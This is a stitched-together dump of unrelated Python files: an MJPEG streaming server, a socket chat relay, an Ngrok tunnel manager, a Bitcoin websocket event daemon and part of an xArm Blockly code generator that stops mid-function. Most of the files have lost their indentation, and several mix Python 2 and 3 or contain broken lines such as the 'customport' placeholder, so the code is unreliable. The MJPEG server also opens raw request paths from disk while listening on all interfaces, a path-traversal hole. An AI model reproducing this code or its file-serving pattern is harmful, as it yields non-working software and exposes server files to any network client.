# Author: Zhuo Chen <zhuoc@cs.cmu.edu>
#
# Copyright (C) 2011-2013 Carnegie Mellon University
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import multiprocessing
import os
import pprint
import queue
import re
from socketserver import ThreadingMixIn
import sys
import threading
import time
import gabriel
import gabriel.control
LOG = gabriel.logging.getLogger(__name__)
dir_file = os.path.dirname(os.path.realpath(__file__))
class MJPEGStreamHandler(BaseHTTPRequestHandler, object):
def do_POST(self):
pass
def do_GET(self):
try:
self.path = self.path.split('?')[0]
print(self.path)
if self.path.endswith(".mjpeg"):
if self.path.endswith("camera.mjpeg"):
data_queue = gabriel.control.input_display_queue
elif self.path.endswith("output.mjpeg"):
data_queue = gabriel.control.output_display_queue_dict['image']
elif self.path.endswith("debug.mjpeg"):
data_queue = gabriel.control.output_display_queue_dict['debug']
self.send_response(200)
self.wfile.write("Content-Type: multipart/x-mixed-replace; boundary=--aaboundary")
self.wfile.write("\r\n\r\n")
while 1:
if self.server.stopped:
break
try:
image_data = data_queue.get_nowait()
self.wfile.write("--aaboundary\r\n")
self.wfile.write("Content-Type: image/jpeg\r\n")
self.wfile.write("Content-length: " + str(len(image_data)) + "\r\n\r\n")
self.wfile.write(image_data)
self.wfile.write("\r\n\r\n\r\n")
time.sleep(0.001)
except queue.Empty as e:
pass
elif self.path.endswith(".jpeg"):
data_queue = gabriel.control.input_display_queue
try:
image_data = data_queue.get_nowait()
self.send_response(200)
self.send_header('Content-type', 'image/jpeg')
self.end_headers()
self.wfile.write(image_data)
except queue.Empty as e:
pass
elif self.path.endswith("speech"):
data_queue = gabriel.control.output_display_queue_dict['text']
try:
speech_data = data_queue.get_nowait()
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
                    self.wfile.write(speech_data.encode() if isinstance(speech_data, str) else speech_data)
except queue.Empty as e:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write("")
elif self.path.endswith("video"):
data_queue = gabriel.control.output_display_queue_dict['video']
try:
video_url = data_queue.get_nowait()
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
                    self.wfile.write(video_url.encode() if isinstance(video_url, str) else video_url)
except queue.Empty as e:
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
self.wfile.write("")
else:
f = open(dir_file + os.sep + self.path)
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
                self.wfile.write(f.read().encode())
f.close()
return
except IOError:
self.send_error(404,'File Not Found: %s' % self.path)
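# Illustrative client sketch (an assumption: this server is running locally on port 7070, as set up
# in the __main__ block below). Browsers can embed the MJPEG endpoints directly, e.g. an <img> tag
# pointing at /camera.mjpeg, while the one-shot endpoints can simply be polled:
#
#   import urllib.request
#   latest_text = urllib.request.urlopen("http://127.0.0.1:7070/speech").read()
#   one_frame = urllib.request.urlopen("http://127.0.0.1:7070/camera.jpeg").read()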
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
stopped = False
"""Handle requests in a separate thread."""
def serve_forever(self):
while not self.stopped:
self.handle_request()
def terminate(self):
self.server_close()
self.stopped = True
# close all thread
if self.socket != -1:
self.socket.close()
if __name__ == "__main__":
# http server
http_server = ThreadedHTTPServer(('0.0.0.0', 7070), MJPEGStreamHandler)
http_server_thread = threading.Thread(target = http_server.serve_forever)
http_server_thread.daemon = True
http_server_thread.start()
try:
while True:
time.sleep(1)
except Exception as e:
pass
except KeyboardInterrupt as e:
LOG.info("user exits\n")
finally:
if http_server is not None:
http_server.terminate()
|
servidor.py
|
import socket
import threading
import socketserver
def tratarCliente(clientsocket, adress):
    while True:
        msg_cliente = clientsocket.recv(1024).decode("utf-8")  # decode turns the received bytes into a string
        for i in range(0, len(lista_sockets)):
            if adress != lista_adresses[i]:  # do not send the message back to the client that sent it
                lista_sockets[i].send(bytes(msg_cliente, "utf-8"))
        print(msg_cliente)
        if not msg_cliente:  # stops the loop (instead of erroring on recv) if the client is killed in the terminal
            clientsocket.close()
            lista_sockets.remove(clientsocket)
            lista_adresses.remove(adress)  # keep both lists in sync so the indexes still match
            break
lista_sockets = []
lista_adresses = []
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.bind(("localhost",5556))
print("Escutando...")
s.listen(2)
while True:
clientsocket, adress = s.accept()
print("Servidor recebeu concexao de {}".format(adress))
lista_sockets.append(clientsocket)
lista_adresses.append(adress)
t = threading.Thread(target=tratarCliente,args=(clientsocket, adress))
    t.daemon = True # the thread will end when the main program exits
t.start()
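# Illustrative client sketch (an assumption, not part of this file): each client connects to the
# port bound above, sends UTF-8 text, and prints whatever the server relays from the other client.
#
#   import socket, threading
#   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#   s.connect(("localhost", 5556))
#   def receive():
#       while True:
#           print(s.recv(1024).decode("utf-8"))
#   threading.Thread(target=receive, daemon=True).start()
#   while True:
#       s.send(bytes(input(), "utf-8"))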
|
main.py
|
"""
Ngrok Web Manager
Github: @thisiskeanyvy
Instagram: @thisiskeanyvy
Twitter: @thisiskeanyvy
"""
import os, socket, threading
from time import *
from set import *
from webserver import *
from pyngrok import ngrok, conf
#background jobs
webserver_start = threading.Thread(target=webserver_start, name="Ngrok Web Manager")
def main():
set_clear()
webserver_start.start()
admin_tunnel_request = str(input("Do you want to use an Ngrok tunnel for the administration interface? (y or n) "))
if admin_tunnel_request == "y":
public_admin()
else:
print(f"Admin interface : http://127.0.0.1:5000")
tunnel_status()
def public_admin():
public_tunnel_url = ngrok.connect(5000, "http").public_url
print(f"Admin interface : {public_tunnel_url.replace('http','https')}")
def config():
ngrok.set_auth_token("yourtoken")
conf.get_default().region = "fr"
def tunnel_type(kind):
    # map the requested tunnel kind to its port and protocol
    if kind == "ssh":
        port = 22
        protocol = "tcp"
    elif kind == "http":
        port = 80
        protocol = "http"
    else:
        port = "customport"
        protocol = "customport"
    return port, protocol
def tunnel_status():
    return ngrok.get_tunnels()
def tunnel_start():
global tunnel_url
try:
tunnel_url = ngrok.connect(80, "http").public_url
print(tunnel_url)
except KeyboardInterrupt:
print("Stopping ngrok service...")
ngrok.kill()
def tunnel_stop():
ngrok.disconnect(tunnel_url)
if __name__ == "__main__":
main()
|
bitcoin_event.py
|
#!/usr/bin/python
import sqlite3
import os
from threading import Lock
db_filename = 'bitcoin_events.db'
db_filename = os.path.join(os.path.dirname(os.path.realpath(__file__)), db_filename)
# connect db
db_lock = Lock()
conn = sqlite3.connect(db_filename)
# create tables
c = conn.cursor()
c.execute('''create table if not exists txs
(tx text, processed int)''')
c.execute('''create table if not exists blocks
(block text, processed int)''')
c.close()
conn.commit()
def process_tx(tx):
with db_lock:
conn.execute('insert into txs (tx, processed) values (?, 0)', (tx,))
conn.commit()
def process_block(block):
with db_lock:
conn.execute('insert into blocks (block, processed) values (?, 0)', (block,))
conn.commit()
def get_db_txs(conn):
with db_lock:
items = []
txs = conn.execute('select * from txs where processed=0').fetchall()
for tx in txs:
conn.execute('update txs set processed=1 where tx=?', (tx[0],))
items.append(tx[0])
conn.commit()
return items
def get_db_blocks(conn):
with db_lock:
items = []
blocks = conn.execute('select * from blocks where processed=0').fetchall()
for block in blocks:
conn.execute('update blocks set processed=1 where block=?', (block[0],))
items.append(block[0])
conn.commit()
return items
def serve(port, host):
from websocket_server import WebsocketServer
from threading import Thread, Event
import signal
def message_received(client, server, message):
print 'message_received:', message
cmds = message.split('|')
for cmd in cmds:
if cmd.startswith('addr='):
address = cmd[5:]
if server.watched_addresses.has_key(address):
server.watched_addresses[address].append(client)
else:
server.watched_addresses[address] = [client]
if cmd == 'blocks':
server.block_watchers.append(client)
def client_left(client, server):
print 'client_left:', client
addrs = []
for key in server.watched_addresses:
if client in server.watched_addresses[key]:
addrs.append(key)
for addr in addrs:
clients = server.watched_addresses[addr]
clients.remove(client)
if not clients:
del server.watched_addresses[addr]
if client in server.block_watchers:
server.block_watchers.remove(client)
def service_thread(ws_server, evt):
from bitcoinrpc.authproxy import AuthServiceProxy, JSONRPCException
from bitrisk.bitcoind_config import read_default_config
import json
import decimal
config = read_default_config()
testnet = ''
if config.has_key('testnet'):
testnet = config['testnet']
rpc_user = config['rpcuser']
rpc_password = config['rpcpassword']
rpc_connection = AuthServiceProxy("http://%s:%s@%s:%s8332"%(rpc_user, rpc_password, host, testnet))
conn = sqlite3.connect(db_filename)
while not evt.wait(5):
txs = get_db_txs(conn)
for tx in txs:
print 'tx:', tx
tx = rpc_connection.gettransaction(tx)
for details in tx['details']:
addr = details['address']
if ws_server.watched_addresses.has_key(addr):
def decimal_default(obj):
if isinstance(obj, decimal.Decimal):
return float(obj)
raise TypeError
msg = json.dumps(tx, default=decimal_default)
for client in ws_server.watched_addresses[addr]:
ws_server.send_message(client, msg)
blocks = get_db_blocks(conn)
for block in blocks:
print 'block:', block
for client in ws_server.block_watchers:
ws_server.send_message(client, block)
server = WebsocketServer(port, host)
server.watched_addresses = {}
server.block_watchers = []
server.set_fn_message_received(message_received)
server.set_fn_client_left(client_left)
evt = Event()
thread = Thread(target=service_thread, args=(server, evt))
thread.start()
server.run_forever() # catches and exits on SIGINT
evt.set() # stop service_thread
thread.join()
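# A minimal client sketch (assumes the `websocket-client` package; the host,
# port and address below are placeholders):
#   import websocket
#   ws = websocket.create_connection('ws://127.0.0.1:8888')
#   ws.send('addr=<address>|blocks')
#   print(ws.recv())  # JSON-encoded transaction or a raw block hash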
def print_db(table):
    if table != 'txs' and table != 'blocks':
        print('table %s does not exist' % table)
        return
    if table == 'txs':
        txs = conn.execute('select * from txs').fetchall()
        print('txs (%d)' % len(txs))
        for tx in txs:
            print(' ', tx)
    if table == 'blocks':
        blocks = conn.execute('select * from blocks').fetchall()
        print('blocks (%d)' % len(blocks))
        for block in blocks:
            print(' ', block)
if __name__ == '__main__':
import sys
if len(sys.argv) >= 3:
cmd = sys.argv[1]
arg = sys.argv[2]
if cmd == 'tx':
process_tx(arg)
elif cmd == 'block':
process_block(arg)
elif cmd == 'print':
print_db(arg)
elif cmd == 'serve':
from bitrisk.daemon import Daemon
class BitcoinEventDaemon(Daemon):
def run(self):
host = os.getenv('HOST', '127.0.0.1')
serve(8888, host)
daemon = BitcoinEventDaemon('/tmp/bitcoin-event-daemon.pid')
if 'start' == arg:
daemon.start()
elif 'stop' == arg:
daemon.stop()
elif 'restart' == arg:
daemon.restart()
elif 'foreground' == arg:
daemon.run()
            else:
                print("usage: %s serve start|stop|restart|foreground" % sys.argv[0])
                sys.exit(2)
sys.exit(0)
|
blockly_tool.py
|
#!/usr/bin/env python3
# Software License Agreement (BSD License)
#
# Copyright (c) 2019, UFACTORY, Inc.
# All rights reserved.
#
# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>
try:
import xml.etree.cElementTree as ET
except ImportError:
import xml.etree.ElementTree as ET
import re
import sys
import json
import time
import random
from .blockly_highlight_block import HIGHLIGHT_BLOCKS
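# BlocklyTool walks an xArm Studio Blockly XML project and emits an equivalent
# standalone Python script built on the xArm-Python-SDK (XArmAPI).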
class BlocklyTool(object):
def __init__(self, path):
self.tree = ET.parse(path)
self.root = self.tree.getroot()
self.namespace = self.get_namespace()
self._ops = {
'EQ': '==',
'NEQ': '!=',
'LT': '<',
'LTE': '<=',
'GT': '>',
'GTE': '>='
}
self._ops2 = {
'===': '==',
'!==': '!=',
'>=': '>=',
'>': '>',
'<=': '<=',
'<': '<',
}
self._code_list = []
self._hasEvent = False
self._events = {}
self._funcs = {}
self._func_cls_exist = False
self._func_index = 0
self._index = -1
self._first_index = 0
self._is_insert = False
self.codes = ''
self._succeed = True
self._show_comment = False
self._highlight_callback = None
@property
def index(self):
self._index += 1
return self._index
@property
def func_index(self):
self._func_index += 1
return self._func_index
@property
def first_index(self):
self._first_index += 1
self._index += 1
return self._first_index
def _append_to_file(self, data):
if not self._is_insert:
self._code_list.append(data)
else:
self._code_list.insert(self.first_index, data)
def _insert_to_file(self, i, data):
self._code_list.insert(i, data)
def get_namespace(self):
try:
r = re.compile('({.+})')
if r.search(self.root.tag) is not None:
ns = r.search(self.root.tag).group(1)
else:
ns = ''
except Exception as e:
# print(e)
ns = ''
return ns
def get_node(self, tag, root=None):
if root is None:
root = self.root
return root.find(self.namespace + tag)
def get_nodes(self, tag, root=None, descendant=False, **kwargs):
if root is None:
root = self.root
nodes = []
if descendant:
func = root.iter
else:
func = root.findall
for node in func(self.namespace + tag):
flag = True
for k, v in kwargs.items():
                if node.attrib.get(k) != v:
flag = False
if flag:
nodes.append(node)
return nodes
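    # Emit the generated script's header: imports, XArmAPI setup, the shared
    # params dict, and the error/state/count/connect callback registrations.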
def _init_py3(self, arm=None, init=True, wait_seconds=1, mode=0, state=0, error_exit=True, stop_exit=True):
self._insert_to_file(self.index, '#!/usr/bin/env python3')
self._insert_to_file(self.index, '# Software License Agreement (BSD License)\n#')
self._insert_to_file(self.index, '# Copyright (c) {}, UFACTORY, Inc.'.format(time.localtime(time.time()).tm_year))
self._insert_to_file(self.index, '# All rights reserved.\n#')
self._insert_to_file(self.index, '# Author: Vinman <vinman.wen@ufactory.cc> <vinman.cub@gmail.com>\n')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, '# Notice')
self._insert_to_file(self.index, '# 1. Changes to this file on Studio will not be preserved')
self._insert_to_file(self.index, '# 2. The next conversion will overwrite the file with the same name')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, 'import sys')
self._insert_to_file(self.index, 'import math')
self._insert_to_file(self.index, 'import time')
self._insert_to_file(self.index, 'import datetime')
self._insert_to_file(self.index, 'import random')
self._insert_to_file(self.index, 'import traceback')
self._insert_to_file(self.index, 'import threading\n')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, '# xArm-Python-SDK: https://github.com/xArm-Developer/xArm-Python-SDK')
self._insert_to_file(self.index, '# git clone git@github.com:xArm-Developer/xArm-Python-SDK.git')
self._insert_to_file(self.index, '# cd xArm-Python-SDK')
self._insert_to_file(self.index, '# python setup.py install')
self._insert_to_file(self.index, '"""')
self._insert_to_file(self.index, 'try:')
self._insert_to_file(self.index, ' from xarm.tools import utils')
self._insert_to_file(self.index, 'except:')
self._insert_to_file(self.index, ' pass')
self._insert_to_file(self.index, 'from xarm import version')
self._insert_to_file(self.index, 'from xarm.wrapper import XArmAPI\n')
# self._insert_to_file(self.index, 'locals_keys = list(locals().keys())\n\n')
self._insert_to_file(self.index, 'def pprint(*args, **kwargs):')
self._insert_to_file(self.index, ' try:')
self._insert_to_file(self.index, ' stack_tuple = traceback.extract_stack(limit=2)[0]')
self._insert_to_file(self.index, ' print(\'[{}][{}] {}\'.format('
'time.strftime(\'%Y-%m-%d %H:%M:%S\', time.localtime(time.time())), '
'stack_tuple[1], \' \'.join(map(str, args))))')
self._insert_to_file(self.index, ' except:')
# self._insert_to_file(self.index, ' pass')
self._insert_to_file(self.index, ' print(*args, **kwargs)\n')
self._insert_to_file(self.index, 'pprint(\'xArm-Python-SDK Version:{}\'.format(version.__version__))\n')
# if self._highlight_callback is None:
# self._insert_to_file(self.index, 'highlight_callback = lambda x:x')
if arm is None:
self._insert_to_file(self.index, 'arm = XArmAPI(sys.argv[1])')
elif isinstance(arm, str):
self._insert_to_file(self.index, 'arm = XArmAPI(\'{}\')'.format(arm))
if init:
self._insert_to_file(self.index, 'arm.clean_warn()')
self._insert_to_file(self.index, 'arm.clean_error()')
self._insert_to_file(self.index, 'arm.motion_enable(True)')
self._insert_to_file(self.index, 'arm.set_mode({})'.format(mode))
self._insert_to_file(self.index, 'arm.set_state({})'.format(state))
if wait_seconds > 0:
self._insert_to_file(self.index, 'time.sleep({})\n'.format(wait_seconds))
variables = self.parse_vars()
variables = {var: 0 for var in variables}
self._insert_to_file(self.index, 'variables = {}'.format(variables))
self._insert_to_file(self.index, 'params = {\'speed\': 100, \'acc\': 2000, '
'\'angle_speed\': 20, \'angle_acc\': 500, '
'\'events\': {}, \'variables\': variables, '
'\'callback_in_thread\': True, \'quit\': False}')
if error_exit:
self._insert_to_file(self.index, '\n\n# Register error/warn changed callback')
self._insert_to_file(self.index, 'def error_warn_change_callback(data):')
self._insert_to_file(self.index, ' if data and data[\'error_code\'] != 0:')
# self._insert_to_file(self.index, ' arm.set_state(4)')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'err={}, quit\'.format(data[\'error_code\']))')
self._insert_to_file(self.index, ' arm.release_error_warn_changed_callback(error_warn_change_callback)')
self._insert_to_file(self.index, 'arm.register_error_warn_changed_callback(error_warn_change_callback)')
if stop_exit:
self._insert_to_file(self.index, '\n\n# Register state changed callback')
self._insert_to_file(self.index, 'def state_changed_callback(data):')
self._insert_to_file(self.index, ' if data and data[\'state\'] == 4:')
self._insert_to_file(self.index, ' if arm.version_number[0] > 1 or (arm.version_number[0] == 1 and arm.version_number[1] > 1):')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'state=4, quit\')')
self._insert_to_file(self.index, ' arm.release_state_changed_callback(state_changed_callback)')
self._insert_to_file(self.index, 'arm.register_state_changed_callback(state_changed_callback)')
self._insert_to_file(self.index, '\n\n# Register counter value changed callback')
self._insert_to_file(self.index, 'if hasattr(arm, \'register_count_changed_callback\'):')
self._insert_to_file(self.index, ' def count_changed_callback(data):')
self._insert_to_file(self.index, ' if not params[\'quit\']:')
self._insert_to_file(self.index, ' pprint(\'counter val: {}\'.format(data[\'count\']))')
self._insert_to_file(self.index, ' arm.register_count_changed_callback(count_changed_callback)')
self._insert_to_file(self.index, '\n\n# Register connect changed callback')
self._insert_to_file(self.index, 'def connect_changed_callback(data):')
self._insert_to_file(self.index, ' if data and not data[\'connected\']:')
self._insert_to_file(self.index, ' params[\'quit\'] = True')
self._insert_to_file(self.index, ' pprint(\'disconnect, connected={}, reported={}, quit\'.format(data[\'connected\'], data[\'reported\']))')
        self._insert_to_file(self.index, '        arm.release_connect_changed_callback(connect_changed_callback)')
self._insert_to_file(self.index, 'arm.register_connect_changed_callback(connect_changed_callback)\n')
self._first_index = self._index
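    # Emit the generated script's tail: a main loop if events were registered,
    # followed by the callback release calls.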
def _finish_py3(self, error_exit=True, stop_exit=True):
if self._hasEvent:
self._append_to_file('\n# Main loop')
self._append_to_file('while arm.connected and arm.error_code == 0 and not params[\'quit\']:')
self._append_to_file(' time.sleep(0.5)')
self._append_to_file('\n# release all event')
self._append_to_file('if hasattr(arm, \'release_count_changed_callback\'):')
self._append_to_file(' arm.release_count_changed_callback(count_changed_callback)')
if error_exit:
            self._append_to_file('arm.release_error_warn_changed_callback(error_warn_change_callback)')
if stop_exit:
self._append_to_file('arm.release_state_changed_callback(state_changed_callback)')
        self._append_to_file('arm.release_connect_changed_callback(connect_changed_callback)\n')
def to_python(self, path=None, arm=None, init=True, wait_seconds=1, mode=0, state=0,
error_exit=True, stop_exit=True, show_comment=False, **kwargs):
self._show_comment = show_comment
self._succeed = True
self._highlight_callback = kwargs.get('highlight_callback', None)
self._init_py3(arm=arm, init=init, wait_seconds=wait_seconds, mode=mode, state=state, error_exit=error_exit, stop_exit=stop_exit)
self.parse()
self._finish_py3(error_exit=error_exit, stop_exit=stop_exit)
self.codes = '\n'.join(self._code_list)
if path is not None:
with open(path, 'w', encoding='utf-8') as f:
f.write('{}\n'.format(self.codes))
return self._succeed
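    # Typical use (sketch; the .xml path and target IP are placeholders):
    #   tool = BlocklyTool('/path/to/project.xml')
    #   ok = tool.to_python(path='app.py', arm='192.168.1.100')
    #   # tool.codes now holds the generated source; ok is False if any block
    #   # could not be converted.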
def parse_vars(self):
var_list = []
variables = self.get_nodes('variables')
for vars in variables:
for variable in self.get_nodes('variable', root=vars):
var_list.append(variable.text)
return var_list
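    # parse() walks <block> elements (following <next> chains) and dispatches
    # each one to a _handle_<type> method; unknown block types mark the
    # conversion as failed.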
def parse(self, root=None, prefix='', arg_map=None):
blocks = self.get_nodes('block', root=root)
if blocks:
for block in blocks:
is_statement = root is None
if root is not None:
if root.tag == self.namespace + 'statement':
is_statement = True
while block is not None:
if not is_statement:
block = self.get_node('next', root=block)
if not block:
break
block = self.get_node('block', root=block)
else:
is_statement = False
if block.attrib.get('disabled', False):
continue
func = getattr(self, '_handle_{}'.format(block.attrib['type']), None)
if func:
if self._highlight_callback is not None:
if block.attrib['type'] in HIGHLIGHT_BLOCKS:
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
self._append_to_file('{} highlight_callback(\'{}\')'.format(prefix, block.attrib['id']))
# if block.attrib['type'] not in ['procedures_defnoreturn', 'procedures_defreturn', 'controls_if']:
# self._append_to_file('{}highlight_callback(\'{}\')'.format(prefix, block.attrib['id']))
func(block, prefix, arg_map=arg_map)
else:
self._succeed = False
print('block {} can\'t convert to python code'.format(block.attrib['type']))
# block = self.get_node('block', root=root)
# while block is not None:
# if not is_statement:
# block = self.get_node('next', root=block)
# if not block:
# break
# block = self.get_node('block', root=block)
# else:
# is_statement = False
# if block.attrib.get('disabled', False):
# continue
# func = getattr(self, '_handle_{}'.format(block.attrib['type']), None)
# if func:
# func(block, prefix)
# else:
# print('block {} can\'t convert to python code'.format(block.attrib['type']))
def __check_is_quit(self, prefix):
self._append_to_file('{}if not params[\'quit\']:'.format(prefix))
return ' {}'.format(prefix)
def _handle_set_speed(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'speed\'] = {}'.format(prefix, value))
def _handle_set_acceleration(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'acc\'] = {}'.format(prefix, value))
def _handle_set_angle_speed(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'angle_speed\'] = {}'.format(prefix, value))
def _handle_set_angle_acceleration(self, block, prefix='', arg_map=None):
field = self.get_node('field', root=block)
if field is not None:
value = field.text
else:
value = self.get_node('value', root=block)
value = self.get_nodes('field', root=value, descendant=True)[0].text
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}params[\'angle_acc\'] = {}'.format(prefix, value))
def _handle_set_counter_increase(self, block, prefix='', arg_map=None):
# field = self.get_node('field', root=block)
# if field is not None:
# value = field.text
# else:
# value = self.get_node('value', root=block)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set counter increase'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_counter_increase()'.format(prefix))
def _handle_set_counter_reset(self, block, prefix='', arg_map=None):
if self._show_comment:
self._append_to_file('{}# set counter reset'.format(prefix))
prefix = self.__check_is_quit(prefix)
self._append_to_file('{}arm.set_counter_reset()'.format(prefix))
def _handle_reset(self, block, prefix='', arg_map=None):
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.reset()'.format(prefix))
def _handle_sleep(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
value = self.__get_block_val(value, arg_map=arg_map)
# value = self.get_nodes('field', root=value, descendant=True)[0].text
if self._show_comment:
self._append_to_file('{}# set pause time'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} arm.set_pause_time({})'.format(prefix, value))
def _handle_move(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
orientation = fields[0].text
wait = fields[1].text == 'TRUE'
value = fields[2].text
if orientation == 'forward':
param = 'x'
elif orientation == 'backward':
param = 'x'
value = '-{}'.format(value)
elif orientation == 'left':
param = 'y'
elif orientation == 'right':
param = 'y'
value = '-{}'.format(value)
elif orientation == 'up':
param = 'z'
elif orientation == 'down':
param = 'z'
value = '-{}'.format(value)
else:
return
if self._show_comment:
self._append_to_file('{}# relative move'.format(prefix))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position({}={}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'relative=True, wait={})'.format(prefix, param, value, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_arc_to(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
p_block = self.get_node('block', root=value)
fields = self.get_nodes('field', root=p_block)
values = []
for field in fields[:-2]:
values.append(float(field.text))
radius = float(fields[-2].text)
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_circle(self, block, prefix='', arg_map=None):
values = self.get_nodes('value', root=block)
# percent = self.get_nodes('field', root=values[2], descendant=True)[0].text
# percent = round(float(percent) / 360 * 100, 2)
# wait = self.get_nodes('field', root=values[3], descendant=True)[0].text == 'TRUE'
percent = self.__get_block_val(values[2], arg_map=arg_map)
wait = self.__get_block_val(values[3], arg_map=arg_map)
if wait == 'TRUE' or wait == 'FALSE':
wait = wait == 'TRUE'
p1_block = self.get_node('block', root=values[0])
fields = self.get_nodes('field', root=p1_block)
pose1 = []
for field in fields:
pose1.append(float(field.text))
p2_block = self.get_node('block', root=values[1])
fields = self.get_nodes('field', root=p2_block)
pose2 = []
for field in fields:
pose2.append(float(field.text))
if self._show_comment:
self._append_to_file('{}# move circle and {}'.format(
prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.move_circle({}, {}, float({}) / 360 * 100, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'wait={})'.format(prefix, pose1, pose2, percent, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'move_circle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_7(self, block, prefix='', arg_map=None):
value = self.get_node('value', root=block)
p_block = self.get_node('block', root=value)
fields = self.get_nodes('field', root=p_block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={})'.format(prefix, values, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_joints(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-1]:
values.append(float(field.text))
radius_fields = self.get_nodes('field', root=block, name='r')
if len(radius_fields) > 0:
radius = values[-1]
values = values[:-1]
else:
radius = None
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move joint and {}'.format(prefix, 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_servo_angle(angle={}, speed=params[\'angle_speed\'], '
'mvacc=params[\'angle_acc\'], wait={}, radius={})'.format(prefix, values, wait, radius))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_servo_angle, code={{}}\'.format(code))'.format(prefix))
def _handle_move_cartesian(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-2]:
values.append(float(field.text))
radius = float(fields[-2].text)
wait = fields[-1].text == 'TRUE'
if self._show_comment:
self._append_to_file('{}# move{}line and {}'.format(
prefix, ' arc ' if float(radius) >= 0 else ' ', 'wait' if wait else 'no wait'))
self._append_to_file('{}if arm.error_code == 0 and not params[\'quit\']:'.format(prefix))
self._append_to_file('{} code = arm.set_position(*{}, speed=params[\'speed\'], mvacc=params[\'acc\'], '
'radius={}, wait={})'.format(prefix, values, radius, wait))
self._append_to_file('{} if code != 0:'.format(prefix))
self._append_to_file('{} params[\'quit\'] = True'.format(prefix))
self._append_to_file('{} pprint(\'set_position, code={{}}\'.format(code))'.format(prefix))
def _handle_move_tool_line(self, block, prefix='', arg_map=None):
fields = self.get_nodes('field', root=block)
values = []
for field in fields[:-1]:
